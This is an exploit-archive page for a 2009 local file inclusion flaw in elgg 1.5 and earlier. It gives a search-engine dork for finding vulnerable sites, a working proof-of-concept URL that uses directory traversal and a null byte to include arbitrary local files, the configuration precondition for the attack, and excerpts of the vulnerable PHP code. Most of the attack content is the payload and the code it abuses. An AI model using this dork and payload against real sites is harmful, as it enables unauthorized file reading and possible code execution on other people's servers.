exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

elgg 1.5 Local File Inclusion

elgg 1.5 Local File Inclusion
Posted Aug 6, 2009
Authored by eLwaux

elgg versions 1.5 and below suffer fro a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | dc52921cd87d251005156724a5644a59e707f684921d2a4f1e1c88b46ed0b7bc

elgg 1.5 Local File Inclusion

Change Mirror Download
Product: elgg.org
Version: <= 1.5
Dork: "Powered by Elgg, the leading open source social networking platform"

eLwaux(c)2009
UASC.org.UA

POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD

need: in table `datalists` must be record `simplecache_enabled` = 0
(default `simplecache_enabled ` = 1)

Vulnerability Code:
-----------------------------------------------------------------------
/_css/js.php:
33: $viewinput['view'] = 'js/' . $_GET['js'];
42: require_once(dirname(dirname(__FILE__)) . '/simplecache/view.php');
/simplecache/view.php:
26: $view = $viewinput['view'];
30: if (@mysql_select_db($CONFIG->dbname,$mysql_dblink)) {
48: if ($simplecache_enabled || $override) {
49: $filename = $dataroot . 'views_simplecache/' . md5($viewtype . $view);
51: $contents = file_get_contents($filename);
56: } else {
59: $contents = elgg_view($view);
/lib/elgglib.php:
237: function elgg_view($view, ..
317: foreach($viewlist as $priority => $view) {
321: if (file_exists($view_location . "{$viewtype}/{$view}.php") &&
!include($view_location . "{$viewtype}/{$view}.php")) {
-----------------------------------------------------------------------


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close